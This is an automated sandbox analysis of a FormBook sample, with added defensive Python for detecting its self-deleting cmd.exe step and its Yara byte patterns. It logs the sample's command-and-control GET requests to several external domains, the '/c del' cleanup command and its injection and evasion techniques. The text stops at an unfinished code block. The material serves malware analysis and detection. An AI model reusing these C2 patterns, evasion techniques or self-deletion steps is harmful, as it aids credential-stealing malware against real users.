
Analysis Report NQQWym075C.exe

Overview

General Information

Sample Name: NQQWym075C.exe
Analysis ID: 321308
MD5: bf75ed61e1b1f7b310ec1d999077c4dd
SHA1: cdced77e176e38ff459cdea08941de26861647cd
SHA256: 69357684ec8f83d428d2030db5f3d586718207e86457465e7fd37b3b4b7c4db2
Tags: exe, Formbook

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • NQQWym075C.exe (PID: 5264 cmdline: 'C:\Users\user\Desktop\NQQWym075C.exe' MD5: BF75ED61E1B1F7B310EC1D999077C4DD)
    • RegAsm.exe (PID: 5368 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 1844 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 808 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cscript.exe (PID: 6064 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
    • NQQWym075C.exe (PID: 1744 cmdline: 'C:\Users\user\Desktop\NQQWym075C.exe' MD5: BF75ED61E1B1F7B310EC1D999077C4DD)
      • RegAsm.exe (PID: 5776 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
  • cleanup
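The tree above ends with cmd.exe, spawned by wlanext.exe, deleting the RegAsm.exe image that hosted the injected payload two levels up. What follows is an added example and not part of the Joe Sandbox report: a small detector over process-creation events that looks for a cmd.exe `/c del <path>` whose target is the on-disk image of another process in the same tree, and reports that process's lineage. The event list is constructed from the PIDs and command lines in the Startup section. Two values are assumptions made for the example: explorer.exe is given parent PID 0 (it is the already running shell; the report draws it under RegAsm.exe because of injection, not because RegAsm.exe spawned it) and the sample is given explorer.exe as its parent.

```python
"""Added example (not from the Joe Sandbox report): flag a cmd.exe '/c del' whose
target is the on-disk image of another process in the same tree, the cleanup step
visible in the Startup section (wlanext.exe -> cmd.exe /c del ...RegAsm.exe)."""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable image
    cmdline: str    # command line as logged (arguments only for cmd.exe, as in the report)


NET = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319"

# Constructed from the report's Startup tree. Real telemetry would show explorer.exe
# (the already running shell) with a parent such as userinit.exe, not RegAsm.exe: the
# report places it under RegAsm.exe because of injection. ppid 0 for explorer.exe and
# parent 3388 for the sample are assumptions made for this example.
EVENTS: List[ProcEvent] = [
    ProcEvent(3388, 0, r"C:\Windows\explorer.exe", ""),
    ProcEvent(5264, 3388, r"C:\Users\user\Desktop\NQQWym075C.exe",
              r"'C:\Users\user\Desktop\NQQWym075C.exe'"),
    ProcEvent(5368, 5264, NET + r"\RegAsm.exe", NET + r"\RegAsm.exe"),
    ProcEvent(1844, 3388, r"C:\Windows\SysWOW64\wlanext.exe", r"C:\Windows\SysWOW64\wlanext.exe"),
    ProcEvent(808, 1844, r"C:\Windows\SysWOW64\cmd.exe", r"/c del '" + NET + r"\RegAsm.exe'"),
    ProcEvent(5232, 808, r"C:\Windows\system32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(6064, 3388, r"C:\Windows\SysWOW64\cscript.exe", r"C:\Windows\SysWOW64\cscript.exe"),
]

# '/c del [switches] <path>'; the path may be wrapped in single or double quotes.
DEL_RE = re.compile(r"""/c\s+del\s+(?:/[a-z]\s+)*["']?(?P<path>[a-z]:\\[^"']+)["']?""", re.IGNORECASE)


def lineage(events: List[ProcEvent], pid: int) -> List[ProcEvent]:
    """Ancestors of pid, nearest first, following ppid links while they resolve."""
    by_pid = {e.pid: e for e in events}
    chain, seen, cur = [], {pid}, by_pid.get(pid)
    while cur is not None and cur.ppid in by_pid and cur.ppid not in seen:
        cur = by_pid[cur.ppid]
        seen.add(cur.pid)
        chain.append(cur)
    return chain


def find_image_cleanup(events: List[ProcEvent]) -> List[Dict[str, object]]:
    """One finding per cmd.exe that deletes the image of another recorded process."""
    by_image = {e.image.lower(): e for e in events}
    findings = []
    for e in events:
        if not e.image.lower().endswith("\\cmd.exe"):
            continue
        m = DEL_RE.search(e.cmdline)
        if m is None:
            continue
        victim = by_image.get(m.group("path").strip().lower())
        if victim is None:
            continue  # deleting a file that never ran here is out of scope for this rule
        chain = lineage(events, e.pid)
        findings.append({
            "cmd_pid": e.pid,
            "parent_image": chain[0].image if chain else None,
            "deleted_image": victim.image,
            "deleted_pid": victim.pid,
            "ancestry": [a.image for a in chain],
        })
    return findings


if __name__ == "__main__":
    for finding in find_image_cleanup(EVENTS):
        print(finding)
```

Run against the constructed events it yields one finding: cmd.exe 808, parent wlanext.exe, deleting the image of PID 5368 (RegAsm.exe), with ancestry wlanext.exe then explorer.exe. The rule keys on the relationship between the deleted path and an earlier process, which survives the random choice of host binary (here wlanext.exe) that the tree shows.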

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x16679:$sqlite3step: 68 34 1C 7B E1
    • 0x1678c:$sqlite3step: 68 34 1C 7B E1
    • 0x166a8:$sqlite3text: 68 38 2A 90 C5
    • 0x167cd:$sqlite3text: 68 38 2A 90 C5
    • 0x166bb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x167e3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(34 entries in total; only the first are reproduced here)

      Unpacked PEs

Source | Rule | Description | Author | Strings
2.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.RegAsm.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.RegAsm.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x16679:$sqlite3step: 68 34 1C 7B E1
        • 0x1678c:$sqlite3step: 68 34 1C 7B E1
        • 0x166a8:$sqlite3text: 68 38 2A 90 C5
        • 0x167cd:$sqlite3text: 68 38 2A 90 C5
        • 0x166bb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x167e3:$sqlite3blob: 68 53 D8 7F 8C
2.2.RegAsm.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.RegAsm.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x77c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13855:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13341:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13957:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13acf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x856a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x92e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18947:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x199ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(13 entries in total; only the first are reproduced here)
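Two things in the match tables above are worth making concrete. First, the JPCERT/CC rule's strings (`68 34 1C 7B E1` and the other two) are each an x86 `push imm32`, so every hit is a 32-bit constant being pushed as an argument; the rule names the constants after sqlite3 API calls. Second, each string sits exactly 0xE00 bytes earlier in `2.2.RegAsm.exe.400000.0.unpack` than in `2.2.RegAsm.exe.400000.0.raw.unpack` (0x77c8 vs 0x85c8 for `$sequence_0`, 0x199ea vs 0x1a7ea for `$sequence_9`): the raw dump is the memory-mapped image, the unpacked file has been rebuilt with file-aligned sections, and the delta is the gap between a section's RVA and its raw file pointer. The following is an added example, not code from the report or from the rule authors, that scans a constructed memory image for the three JPCERT patterns and translates dump offsets to file offsets. The section table is an assumption (one section mapped at RVA 0x1000, stored at file offset 0x200) chosen to reproduce the 0xE00 delta, not a table parsed from the sample, and the rule condition is assumed to be "all of them".

```python
"""Added example (not from the report or the rule authors): scan a memory image for
the three byte patterns of the JPCERT/CC "Formbook" Yara rule, and show why the
report prints every string 0xE00 bytes earlier in the ".unpack" view than in the
".raw.unpack" view of the same region."""
import struct
from dataclasses import dataclass
from typing import Dict, List

PUSH_IMM32 = 0x68  # x86 opcode: push <32-bit immediate>

# Strings of the JPCERT/CC rule, copied from the match rows in the report.
JPCERT_FORMBOOK_STRINGS: Dict[str, bytes] = {
    "sqlite3step": bytes.fromhex("68 34 1C 7B E1"),
    "sqlite3text": bytes.fromhex("68 38 2A 90 C5"),
    "sqlite3blob": bytes.fromhex("68 53 D8 7F 8C"),
}

# Offsets at which the report found them in 2.2.RegAsm.exe.400000.0.raw.unpack.
REPORTED_RAW_OFFSETS: Dict[str, List[int]] = {
    "sqlite3step": [0x16679, 0x1678C],
    "sqlite3text": [0x166A8, 0x167CD],
    "sqlite3blob": [0x166BB, 0x167E3],
}


def pushed_constant(pattern: bytes) -> int:
    """The little-endian immediate carried by a 5-byte `push imm32`."""
    if len(pattern) != 5 or pattern[0] != PUSH_IMM32:
        raise ValueError("not a push imm32")
    return struct.unpack("<I", pattern[1:])[0]


def find_all(buf: bytes, pat: bytes) -> List[int]:
    """All (possibly overlapping) offsets of pat in buf, ascending."""
    hits, i = [], buf.find(pat)
    while i != -1:
        hits.append(i)
        i = buf.find(pat, i + 1)
    return hits


def scan(buf: bytes) -> Dict[str, List[int]]:
    return {name: find_all(buf, pat) for name, pat in JPCERT_FORMBOOK_STRINGS.items()}


def rule_matches(hits: Dict[str, List[int]]) -> bool:
    """Assumed condition 'all of them': every string must occur at least once."""
    return all(hits.get(name) for name in JPCERT_FORMBOOK_STRINGS)


def make_image(size: int = 0x1B000) -> bytes:
    """Constructed stand-in for the dumped region: zeros with the patterns planted at
    the offsets the report lists. No other content of the sample is reproduced."""
    img = bytearray(size)
    for name, offs in REPORTED_RAW_OFFSETS.items():
        for off in offs:
            img[off:off + 5] = JPCERT_FORMBOOK_STRINGS[name]
    return bytes(img)


@dataclass(frozen=True)
class Section:
    name: str
    virtual_address: int  # RVA at which the loader maps the section
    raw_pointer: int      # PointerToRawData: where its bytes sit in the file
    size: int


# Hypothetical section table (an assumption, not parsed from the sample): a section
# mapped at RVA 0x1000 but stored at file offset 0x200 gives the constant 0xE00 gap
# between the report's .raw.unpack (memory-mapped) and .unpack (file) offsets.
SECTIONS: List[Section] = [Section(".text", 0x1000, 0x200, 0x1A000)]


def mapped_to_file_offset(mapped: int, sections: List[Section]) -> int:
    """Translate an offset in the memory-mapped dump to the rebuilt PE's file offset."""
    for s in sections:
        if s.virtual_address <= mapped < s.virtual_address + s.size:
            return mapped - s.virtual_address + s.raw_pointer
    raise ValueError(f"offset {mapped:#x} falls outside every section")


if __name__ == "__main__":
    hits = scan(make_image())
    print("rule matches:", rule_matches(hits))
    for name, offs in hits.items():
        const = pushed_constant(JPCERT_FORMBOOK_STRINGS[name])
        print(f"{name}: push {const:#010x} at raw {[hex(o) for o in offs]}, "
              f"file {[hex(mapped_to_file_offset(o, SECTIONS)) for o in offs]}")
```

The same translation applied to the yara-signator offsets gives the numbers in the `.unpack` table (0x85c8 to 0x77c8, 0x1a7ea to 0x199ea), which is a quick way to confirm that two match tables describe the same code rather than two copies of the payload.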

          Sigma Overview

          No Sigma rule has matched

          Signature Overview


          AV Detection:

Multi AV Scanner detection for submitted file
Source: NQQWym075C.exe | Virustotal: Detection: 30%
Source: NQQWym075C.exe | ReversingLabs: Detection: 48%
Yara detected FormBook
Source: Yara match | File source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: NQQWym075C.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 2.2.RegAsm.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.RegAsm.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.NQQWym075C.exe.5fe0000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 4x nop then pop ebx

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49728
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49730
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.3:49731
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 35.186.238.101:80 -> 192.168.2.3:49744
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49745
Source: global traffic | HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=ldw93ncdIRpnK2+SYFZ4XxcSdaL1EJRCuxI9ZUy/FVTDpSzjKcQcxAtGWqTUr4WUWqsB HTTP/1.1 | Host: www.ussouthernhome.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /o56q/?6l=3sSzGDKqeoVzrX5Sn8ux2WAGTszDSWdOTpKicZCtYQqt6BLZU/lZy9O7FBLa6j9xXLzf&Rh=Y2MlpveH8ZUh0bF HTTP/1.1 | Host: www.myreviewandbonuses.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=jRDzq8l+sUykxws9W99RfZyinw9UtZsC3+WzPyJGQo9muB/nYvZVAbl6dW3bW8Aotu+H HTTP/1.1 | Host: www.thrust-board.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /o56q/?6l=kNK7qyUr0rsKRGX6DQjm/XfEOCgL/rCBvSt6iCqDIwEC5hd1LlIznMkcIp/u79mXMRr7&Rh=Y2MlpveH8ZUh0bF HTTP/1.1 | Host: www.teelinkz.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=9Sq28+gy4k4CrtJhpK8mM8fwBZ3GLEhrr70589yX6MfPm6K+L9JTnWLRwUnCkAdg62kX HTTP/1.1 | Host: www.not-taboo.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=M16LsldnfrVP1zxs4qqy0X/sNN1zWVH6uxw1Og8LqWL4V8CpTN5QES3cWjsEPZlyN24a HTTP/1.1 | Host: www.tnicholson.design | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /o56q/?6l=QJ1vQpsCk7HoC7tcDYJYOCEFb+6oaJChP7LjIwOmauzAYwlZDD68O4FtKEqtEO5AoeDi&Rh=Y2MlpveH8ZUh0bF HTTP/1.1 | Host: www.sabaicraft.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=6yhb1plVNlXQq+RzpSC3aP+nXZqT+h1u1iqVXpUKlvKLd7IxuSoQjy9XoIojNuJhzNIO HTTP/1.1 | Host: www.deadroommn.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=r4u6PaE5VJhGb5HfNIqoFHA5GyORyqjhLy9oIJBoAQE4G0DswHvYnpLSr9alOGw3azvw HTTP/1.1 | Host: www.keitakora.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: Joe Sandbox View | IP Address: 35.186.238.101
Source: Joe Sandbox View | IP Address: 198.49.23.141
Source: Joe Sandbox View | IP Address: 23.227.38.64
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: GOOGLEUS
Source: Joe Sandbox View | ASN Name: CLAYERLIMITED-AS-APClayerLimitedHK
Source: unknown | DNS traffic detected: queries for: www.ussouthernhome.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 20 Nov 2020 19:14:52 GMT | Content-Type: text/html | Content-Length: 867 | Connection: close | Server: Apache/2 | Last-Modified: Fri, 10 Jan 2020 16:03:34 GMT | Accept-Ranges: bytes | Accept-Ranges: bytes | Age: 0
Data (the 867 bytes the report lists as Data Raw, decoded; a 404 page that loads an ad iframe from http://www.searchvity.com/):
<!DOCTYPE HTML>
<html>

    <head>
        <title>404 Error - Page Not Found</title>
        <style>
            #ad_frame{ height:800px; width:100%; }
            body{ margin:0; border: 0; padding: 0; }
        </style>
        <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
        <script type="text/javascript" language="JavaScript">
            var url = 'http://www.searchvity.com/?dn='
                + document.domain + '&pid=9POL6F2H4';

            $(document).ready(function() {
                $('#ad_frame').attr('src', url);
            });
        </script>
    </head>
    <body>
        <iframe id="ad_frame" src="http://www.searchvity.com/"
            frameborder="0" scrolling="no">

            <!-- browser does not support iframe's -->

        </iframe>
    </body>

</html>
Source: explorer.exe, 00000003.00000000.252651061.0000000008907000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: wlanext.exe, 00000006.00000002.485637823.00000000034A5000.00000004.00000020.sdmp | String found in binary or memory: http://www.sz360buy.com/d
Source: wlanext.exe, 00000006.00000002.485456630.0000000003496000.00000004.00000020.sdmp | String found in binary or memory: http://www.sz360buy.com/o56q/?6l=2CtK5nvmO
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: wlanext.exe, 00000006.00000002.489818929.0000000003DA2000.00000004.00000001.sdmp | String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js
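The GET requests recorded above share one shape: the path `/o56q/?` followed by two two-character parameters, `Connection: close`, no User-Agent header, and the value `Rh=Y2MlpveH8ZUh0bF` repeated verbatim across nine different hosts while `6l` changes each time (the same `/o56q/?6l=` prefix also appears in wlanext.exe memory for www.sz360buy.com). The following is an added example, not part of the report: it parses raw requests and applies two checks, the report's "HTTP GET or POST without a user agent" signature and a search for a query value that recurs across several distinct hosts, which is what survives the host rotation. The sample requests are constructed from four of the report's request lines plus one made-up benign request with a User-Agent; the seven null bytes the report lists as Data Raw are reproduced as the request body.

```python
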